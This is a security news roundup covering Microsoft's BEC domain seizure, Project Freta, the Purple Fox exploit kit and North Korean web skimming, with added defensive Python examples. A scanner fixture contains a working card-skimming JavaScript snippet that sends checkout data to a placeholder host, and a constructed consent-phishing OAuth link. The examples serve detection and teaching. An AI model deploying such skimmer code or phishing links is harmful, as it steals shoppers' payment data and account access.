Microsoft seized COVID-themed email domains

The technology giant announced the takedown of the business email compromise operation

The attackers tried to gain access to victims’ email inboxes, contacts and other sensitive files in order to send emails to businesses that look like they came from a trusted source. The end goal of the attack is to steal information or redirect wire transfers.

Microsoft said it first detected and scuppered the operation in December, but that the attackers returned, using the COVID-19 pandemic as a fresh lure to open malicious emails. In one week alone, the attackers sent malicious emails to millions of users, Microsoft said.

The case shows a growing trend of using the U.S. court system to shut down cyberattacks when time is of the essence, without having to involve federal authorities, a process that is frequently cumbersome, bureaucratic and seldom quick.

“This unique civil case against COVID-19-themed [business email compromise] attacks has allowed us to proactively disable key domains that are part of the criminals’ malicious infrastructure, which is a critical step in protecting our customers,” said Tom Burt, Microsoft’s corporate vice president for customer security and trust.

The attack worked by tricking victims into turning over access to their email accounts. Court filings seen by TechCrunch describe how the attackers used phishing emails “designed to look like they come from an employer or other trusted source.”

The malicious web app that steals victims’ account access tokens. Image Credits: Microsoft

Once clicked, the phishing email opens a legitimate Microsoft login page. But once the victim enters their username and password, they are redirected to a malicious web app that was built and controlled by the attackers. If the user is tricked into approving the web app access to their accounts, the web app siphons off and sends the victim’s account access tokens to the attackers. Account access tokens are designed to keep users logged in without having to reenter their passwords, but if stolen and abused, can grant full access to a victim’s account.

Burt said the malicious operation allowed the attackers to trick victims into giving over access to their accounts “without explicitly” requiring the victim to turn over their username and password, “as they would in a more traditional phishing campaign.”

With access to those accounts, the attackers would have full control of the accounts to send spoofed messages designed to trick companies into turning over sensitive information or carry out fraud, a common tactic for financially driven attackers.
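The flow described above is an OAuth consent-phishing (illicit consent grant) attack: the sign-in page is genuine, but the consent prompt belongs to an attacker-registered app whose redirect_uri receives the authorization code or token. The triage script below is an added example, not code from Microsoft or from the court filings. It parses an authorization link the way a mail-security filter or an analyst would and flags the telltale combination: a real Microsoft identity host, a redirect to a third-party domain, and scopes that grant standing access to mail, contacts or files. The scope names are real Microsoft Graph delegated permissions; the two sample links, their client IDs and the attacker domain are constructed for the demo.

```python
"""Triage OAuth authorization links of the kind used in consent phishing.

Added example (not Microsoft's code). The sample URLs below are constructed;
only the scope names and the login hosts are real.
"""
from urllib.parse import parse_qs, urlparse

# Hosts that serve the genuine Microsoft identity platform sign-in and consent pages.
IDP_HOSTS = {"login.microsoftonline.com", "login.live.com", "login.windows.net"}

# Delegated Graph permissions that give an app standing access to a mailbox,
# address book or files; offline_access adds a refresh token that outlives the
# user's session, which is what makes a stolen grant so durable.
HIGH_RISK_SCOPES = {
    "offline_access", "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Contacts.Read", "Contacts.ReadWrite", "Files.Read.All",
    "Files.ReadWrite.All", "MailboxSettings.ReadWrite",
}

# Redirect targets treated as first party for this demo (assumption: an org
# would extend this with its own registered apps' redirect URIs).
TRUSTED_REDIRECT_SUFFIXES = (".microsoft.com", ".office.com", ".microsoftonline.com")


def _is_trusted_host(host: str) -> bool:
    return any(host == s.lstrip(".") or host.endswith(s) for s in TRUSTED_REDIRECT_SUFFIXES)


def triage_oauth_link(url: str) -> dict:
    """Return findings plus a coarse risk label for one authorization URL."""
    u = urlparse(url)
    q = parse_qs(u.query)

    def first(key: str) -> str:
        return q.get(key, [""])[0]

    redirect_host = (urlparse(first("redirect_uri")).hostname or "").lower()
    scopes = set(first("scope").split())
    f = {
        "idp_is_microsoft": (u.hostname or "").lower() in IDP_HOSTS,
        "client_id": first("client_id"),
        "redirect_host": redirect_host,
        "redirect_is_third_party": bool(redirect_host) and not _is_trusted_host(redirect_host),
        "risky_scopes": sorted(scopes & HIGH_RISK_SCOPES),
        # prompt=consent forces the consent screen even for a previously seen app.
        "forces_consent_screen": first("prompt") == "consent",
    }
    if not f["idp_is_microsoft"]:
        f["risk"] = "not-ms-login"      # lookalike login page: credential phishing territory
    elif f["redirect_is_third_party"] and f["risky_scopes"]:
        f["risk"] = "high"              # the consent-phishing pattern
    elif f["redirect_is_third_party"]:
        f["risk"] = "medium"
    else:
        f["risk"] = "low"
    return f


# Constructed sample: genuine login host, attacker-controlled callback, mailbox scopes.
PHISH_LINK = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=00000000-1111-2222-3333-444444444444&response_type=code"
    "&redirect_uri=https%3A%2F%2Fofficesuite-upgrade.example%2Fcallback"
    "&response_mode=query&scope=openid%20offline_access%20Mail.Read%20Contacts.Read%20Files.Read.All"
    "&prompt=consent"
)

# Constructed sample: same login host, Microsoft-owned callback, sign-in scopes only.
BENIGN_LINK = (
    "https://login.microsoftonline.com/common/oauth2/v2.0/authorize"
    "?client_id=11111111-2222-3333-4444-555555555555&response_type=code"
    "&redirect_uri=https%3A%2F%2Fteams.microsoft.com%2Fgo&scope=openid%20profile%20User.Read"
)

if __name__ == "__main__":
    for link in (PHISH_LINK, BENIGN_LINK):
        print(triage_oauth_link(link))
```

A "high" result is a triage signal, not proof: legitimate SaaS integrations also ask for Mail.Read with an off-Microsoft redirect. The confirming step is to look the client_id up under the tenant's enterprise applications and consent audit events, and the structural fix is to stop unprivileged users from consenting to unverified apps in the tenant's user consent settings, so that grants like the one described above require admin review.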

The civil case, Burt said, let the company seize the domains used in the attack and so “proactively disable key domains that are part of the criminals’ malicious infrastructure.”

It’s not the first time Microsoft has asked a court to grant it ownership of malicious domains. In the past two years, Microsoft took control of domains belonging to hackers backed by both Russia and Iran.

Project Freta: Microsoft’s new cloud forensics initiative

Microsoft Research yesterday announced Project Freta, a free, cloud-based service for detecting rootkits and advanced malware in memory snapshots of live Linux systems. This service was developed by the NExT Security Ventures (NSV) team at Microsoft Research.

Snapshot-based memory forensics is an old security technique, but until now no major cloud provider has offered it to customers as a service. Project Freta will allow customers to perform full memory audits of thousands of virtual machines (VMs) without intrusive capture mechanisms.

Project Freta intends to automate and democratize VM forensics to a point where every user and every enterprise can sweep volatile memory for unknown malware with the push of a button—no setup required.

Microsoft Research’s Project Freta is now available to the public for free with no usage limit. It is capable of automatically fingerprinting and auditing a memory snapshot of most cloud-based Linux VMs. For now, over 4,000 kernel versions are supported automatically.

Key features:

  • Detects novel malicious software, kernel rootkits, process hiding and other intrusion artifacts without an agent, by operating directly on captured VM snapshots
  • Very easy to use: submit a captured image to generate a report of its contents
  • Memory inspection means no software to install on the guest, and no warning that lets malware evacuate or destroy evidence
  • Designed for automating IR-style discovery tasks directly in a cloud fabric, though volatile memory snapshots captured with an acquisition tool can also be used for bare-metal systems where virtualization is not available
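The "process hiding" detection in the list above is a cross-view technique: a rootkit that unlinks its process from the kernel's process list (DKOM) hides it from `ps` on the live system, but the process structure is still sitting in memory, so a scanner that carves every plausible process record out of the snapshot and diffs it against the linked list will find the gap. The example below is added here to show that idea end to end; it is not Freta's code, and the record layout is a toy one (magic, pid, next-record offset, name), not the real Linux `task_struct`. The 144-byte "snapshot" is constructed inline, with one record deliberately unlinked.

```python
"""Cross-view detection of a hidden process in a memory snapshot (toy layout).

Added example, not Project Freta's code. The image and record format are
constructed for the demo and do not match any real kernel's structures.
"""
import struct

# Toy record: magic, pid, file offset of the next record in the process list,
# NUL-padded command name.  Offset 0 of the image holds the list head offset.
REC_FMT = "<4sII16s"
REC_SIZE = struct.calcsize(REC_FMT)   # 28 bytes
MAGIC = b"TASK"


def build_toy_image() -> bytes:
    """Constructed snapshot: four task records, one of which is unlinked."""
    at = {"init": 16, "sshd": 48, "rootkitd": 80, "cron": 112}
    img = bytearray(144)
    struct.pack_into("<I", img, 0, at["init"])

    def put(name: str, pid: int, nxt: int) -> None:
        struct.pack_into(REC_FMT, img, at[name], MAGIC, pid, nxt,
                         name.encode().ljust(16, b"\0"))

    put("init", 1, at["sshd"])
    put("sshd", 42, at["cron"])         # list skips rootkitd: the DKOM unlink
    put("rootkitd", 1337, at["cron"])   # the unlinked node keeps its own forward pointer
    put("cron", 77, 0)
    return bytes(img)


def read_record(img: bytes, off: int):
    """Parse the record at off; None if it does not look like a valid task."""
    if off < 4 or off + REC_SIZE > len(img):
        return None
    magic, pid, nxt, raw = struct.unpack_from(REC_FMT, img, off)
    name = raw.split(b"\0", 1)[0]
    if magic != MAGIC or pid == 0 or not name or not name.isascii():
        return None
    if nxt != 0 and nxt + REC_SIZE > len(img):   # dangling pointer: not plausible
        return None
    return pid, name.decode()


def walk_process_list(img: bytes) -> list:
    """What 'ps' on the live guest would see: follow the list from its head.
    The visited set guards against a rootkit that loops the list."""
    off = struct.unpack_from("<I", img, 0)[0]
    seen, out = set(), []
    while off and off not in seen:
        seen.add(off)
        rec = read_record(img, off)
        if rec is None:
            break
        out.append(rec)
        off = struct.unpack_from(REC_FMT, img, off)[2]
    return out


def carve_records(img: bytes) -> list:
    """What a scanner sees: every plausible record anywhere in the image,
    regardless of whether anything still points to it."""
    out, pos = [], img.find(MAGIC)
    while pos != -1:
        rec = read_record(img, pos)
        if rec is not None:
            out.append(rec)
        pos = img.find(MAGIC, pos + 1)
    return out


def hidden_processes(img: bytes) -> list:
    """Records present in the carve but absent from the list are hidden."""
    listed = set(walk_process_list(img))
    return sorted(r for r in set(carve_records(img)) if r not in listed)


if __name__ == "__main__":
    snapshot = build_toy_image()
    print("listed:", walk_process_list(snapshot))
    print("carved:", carve_records(snapshot))
    print("hidden:", hidden_processes(snapshot))
```

On a real Linux snapshot the same diff is done between the `init_task` linked list and records carved from the kernel heap, which is why a tool like Freta needs per-kernel-version structure layouts (the "4,000 kernel versions" above); the carving side is also what makes the technique agentless, since nothing has to run inside the guest.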

Purple Fox adds two more Microsoft vulnerabilities

Security company Proofpoint has identified two new exploits coded into Purple Fox, an exploit kit that has evolved dramatically in the last year. The updates show that cyber-criminals are continuing to invest in infection tools to help get their malware onto victims’ systems even though exploit kits are declining as an attack technique, the company said.

An exploit kit is a tool that delivers malware onto a victim’s device automatically via a website. It is an automated threat that uses compromised websites to funnel visitors to its landing page, fingerprints their browsers for known vulnerabilities, and delivers its malware payload to those that are vulnerable.

Exploit kits are the basis for drive-by downloads that infect a victim as soon as they visit a malicious site. They have often been sold as services to distribute malware, providing cyber-criminals with a conduit to infect victims’ machines, but according to Proofpoint their popularity has declined of late.

“Exploit Kits are not as prevalent as they were a few years ago. However, they are still part of the threat landscape,” explained the company. “One thing that hasn’t changed regarding exploit kits is the way in which exploit kit authors regularly update to include new attacks against newly discovered vulnerabilities.”

Purple Fox started out as a fileless downloader Trojan delivered by an exploit kit called Rig. By 2018 it had infected at least 30,000 users, downloading and executing cryptomining malware on victims’ devices. Last year it switched from the Nullsoft Scriptable Install System (NSIS) to Windows PowerShell as the means of retrieving and delivering various kinds of malware.

Now it has evolved into an exploit kit in its own right, built to replace Rig. It has added two new exploits, both patched by Microsoft in the last few months.

The first, CVE-2019-1458, is a local privilege elevation vulnerability in the Win32k component that Microsoft fixed in December last year. The second, CVE-2020-0674, is a scripting engine memory corruption bug in Internet Explorer that Microsoft fixed in its February 2020 Patch Tuesday update.
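An Internet Explorer bug such as CVE-2020-0674 is only reachable from clients that still browse with IE, and a kit gates its payload on exactly that: it reads the User-Agent and only serves the exploit to matching browsers. The same parse, run over proxy logs, tells a defender how much of the fleet is still in the population a kit like Purple Fox targets. The script below is an added example, not Proofpoint's or the kit's code. The one non-obvious detail it handles is that IE11 dropped the `MSIE` token and is identified by `Trident/7.0`, while an IE11 in compatibility mode still advertises an old `MSIE 7.0`, so the Trident engine version is the reliable signal. The log lines and IPs are constructed; the log format (client IP, URL, User-Agent, tab-separated) is an assumption.

```python
"""Measure exposure to an IE-only bug by parsing user agents from proxy logs.

Added example, not code from Proofpoint or from the Purple Fox kit. The log
format and the sample lines are constructed for the demo.
"""
import re
from collections import Counter

# The Trident (IE rendering engine) version maps to the real IE version even
# when a compatibility-mode UA advertises an older "MSIE x.y" token.
_TRIDENT_TO_IE = {4: 8, 5: 9, 6: 10, 7: 11}
_TRIDENT = re.compile(r"Trident/(\d+)\.\d+")
_MSIE = re.compile(r"MSIE (\d+)\.\d+")


def ie_major_version(user_agent: str):
    """Return the IE major version this UA really corresponds to, else None."""
    if "Edge/" in user_agent or "Edg/" in user_agent:   # EdgeHTML / Chromium Edge are not IE
        return None
    m = _TRIDENT.search(user_agent)
    if m and int(m.group(1)) in _TRIDENT_TO_IE:
        return _TRIDENT_TO_IE[int(m.group(1))]
    m = _MSIE.search(user_agent)                         # IE 7 and older: no Trident token
    return int(m.group(1)) if m else None


def ie_exposure(log_lines) -> dict:
    """Map client IP -> IE version for every client still browsing with IE.
    Assumed log format: client_ip<TAB>url<TAB>user_agent, one request per line."""
    exposed = {}
    for line in log_lines:
        parts = line.rstrip("\n").split("\t")
        if len(parts) != 3:
            continue
        ip, _url, ua = parts
        ver = ie_major_version(ua)
        if ver is not None:
            exposed[ip] = ver
    return exposed


def exposure_summary(log_lines) -> Counter:
    """Count exposed clients per IE version, for reporting."""
    return Counter(ie_exposure(log_lines).values())


# Constructed sample log (IPs and URLs are placeholders).
SAMPLE_LOG = [
    "10.0.0.5\thttps://news.example/\tMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "10.0.0.6\thttps://intranet.example/\tMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2)",
    "10.0.0.7\thttps://news.example/\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "10.0.0.8\thttps://legacy.example/\tMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)",
    "10.0.0.9\thttps://news.example/\tMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363",
]

if __name__ == "__main__":
    print(ie_exposure(SAMPLE_LOG))
    print(exposure_summary(SAMPLE_LOG))
```

Clients that show up here are the ones to prioritise for the February 2020 and December 2019 patches, or for removing IE from the browser options altogether.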

“The fact that the authors of the Purple Fox malware have stopped using the RIG EK [exploit kit] and moved to build their own EK to distribute their malware reminds us that malware is a business,” Proofpoint said in its analysis. “In essence, the authors behind the Purple Fox malware decided to bring development ‘in-house’ to reduce costs, just like many legitimate businesses do.”

North Korea in the limelight again, this time with web skimming

North Korea’s state-sponsored hacking crews are breaking into online stores to insert malicious code that can steal buyers’ payment card details as they visit the checkout page and fill in payment forms.

These attacks are known as “web skimming,” “e-skimming,” or “Magecart attacks,” the last name coming from the first group observed using the tactic.

Web skimming attacks are simple in nature, although they require advanced technical skills from hackers to execute. The goal is for hackers to gain access to a web store’s backend server, associated resources, or third-party widgets, where they can install and run malicious code on the store’s frontend.

The code loads only on the checkout page, and silently logs payment card details as they are entered into checkout forms. This data is then exfiltrated to a remote server, from where the hackers collect it and sell it on underground cybercrime markets.

Web skimming attacks usually require the hackers to operate a sizeable infrastructure to host the malicious code and run collection points.
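The behaviour described above (gate on the checkout URL, hook form submission, read the card fields, encode and send them to a third-party host) is also the signature a defender can scan for in the scripts a store serves. The scanner below is an added example, not code from Sansec or from any skimmer; it runs a few heuristics over script text and reports which of those traits are present and which external hosts the script contacts. The two script samples are constructed for the demo, and `shop.example` is the assumed first-party domain.

```python
"""Heuristic scan of a checkout page's scripts for web-skimmer behaviour.

Added example, not Sansec's tooling. Both script samples are constructed.
"""
import re

# Payment field names a skimmer harvests (cc_number, cardNumber, cvv, exp_month ...).
PAYMENT_FIELD = re.compile(r"(cc_?num|card_?num|cvv|cvc|\bcsc\b|exp_?(month|year|date)|expir)", re.I)
# Hooks on form activity: the skimmer reads fields on submit or on every keystroke.
INPUT_HOOK = re.compile(r"addEventListener\(\s*['\"](submit|input|keyup|keydown|change|blur)['\"]", re.I)
VALUE_READ = re.compile(r"\.value\b")
# Ways to push data to a remote host from page script.
EXFIL_SINK = re.compile(r"(new\s+Image\(\)|\.src\s*=|fetch\(|XMLHttpRequest|sendBeacon\()")
ENCODER = re.compile(r"\b(btoa|escape|encodeURIComponent|String\.fromCharCode)\(")
# Only run on the checkout page, so the code stays quiet everywhere else.
CHECKOUT_GATE = re.compile(r"location\.(href|pathname|search)[^;\n]{0,80}(checkout|onepage|payment|billing)", re.I)
ABS_URL = re.compile(r"https?://([A-Za-z0-9.\-]+)")


def _third_party(host: str, first_party: set) -> bool:
    return not any(host == fp or host.endswith("." + fp) for fp in first_party)


def scan_script(js: str, first_party: set) -> dict:
    """Return the traits found in one script plus a verdict."""
    hosts = {h.lower() for h in ABS_URL.findall(js)}
    f = {
        "checkout_gated": bool(CHECKOUT_GATE.search(js)),
        "hooks_form_input": bool(INPUT_HOOK.search(js)),
        "reads_payment_fields": bool(PAYMENT_FIELD.search(js) and VALUE_READ.search(js)),
        "encodes_data": bool(ENCODER.search(js)),
        "uses_exfil_sink": bool(EXFIL_SINK.search(js)),
        "external_hosts": sorted(h for h in hosts if _third_party(h, first_party)),
    }
    if f["reads_payment_fields"] and f["hooks_form_input"] and f["external_hosts"] and f["uses_exfil_sink"]:
        f["verdict"] = "skimmer-like"
    elif f["reads_payment_fields"] and f["external_hosts"]:
        f["verdict"] = "review"
    else:
        f["verdict"] = "benign"
    return f


# Constructed sample shaped like the behaviour described in the article.
SKIMMER_SAMPLE = """
if (location.href.indexOf('checkout') > -1) {
  document.addEventListener('submit', function () {
    var d = {};
    ['cc_number', 'cc_cvv', 'cc_exp_month', 'cc_exp_year', 'name'].forEach(function (n) {
      var e = document.getElementsByName(n)[0];
      if (e) { d[n] = e.value; }
    });
    (new Image()).src = 'https://cdn-assets.example/track.gif?d=' + btoa(JSON.stringify(d));
  });
}
"""

# Constructed benign sample: hooks a form too, but no card fields, first-party host only.
BENIGN_SAMPLE = """
document.getElementById('promo-form').addEventListener('submit', function (ev) {
  ev.preventDefault();
  var code = ev.target.elements.promo.value;
  fetch('https://shop.example/api/promo', { method: 'POST', body: code });
});
"""

if __name__ == "__main__":
    for label, src in (("skimmer", SKIMMER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_script(src, {"shop.example"}))
```

Real skimmers are usually obfuscated or injected into an existing first-party script, so text heuristics like these belong in a crawl of the rendered checkout page plus its network requests rather than a one-off grep. The preventive controls are a Content Security Policy whose `connect-src`, `img-src` and `form-action` directives name only the store's own hosts and payment processor, and Subresource Integrity hashes on every third-party script the checkout page loads.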

A report from Dutch security firm Sansec links domains and server IP addresses used in recent web skimming attacks to previously known North Korean state-sponsored hacking infrastructure.

Researchers said evidence points back to Hidden Cobra (or Lazarus Group), the code name given by the US Department of Homeland Security to Pyongyang’s elite state-operated hacking crews.

[Map from the Sansec report: green = hacked store; red = Hidden Cobra-controlled exfiltration nodes; yellow = unique technique linking the attacks and malicious code]

The findings fit the pattern of North Korean state-sponsored hacking operations. While many government-backed groups engage only in cyber-espionage, North Korea, whose economy is crippled by sanctions, also uses state hackers to raise funds for its government.

Pyongyang’s hackers have been linked to cyber-heists at banks all over the globe, have been involved in ATM heists and ATM cash-outs, have run cryptocurrency scams and have breached cryptocurrency exchanges.

North Korean hackers have also been blamed for the infamous WannaCry attack, which brought a large part of the IT world to its knees in May 2017. Authorities and experts said WannaCry was a botched attempt at creating a ransomware strain for extorting victims, again to raise funds for the Pyongyang regime.

The fact that North Korean hackers have been involved in web skimming incidents is not a surprise to industry experts, as they’ve historically gravitated towards any type of cybercrime that can generate a profit.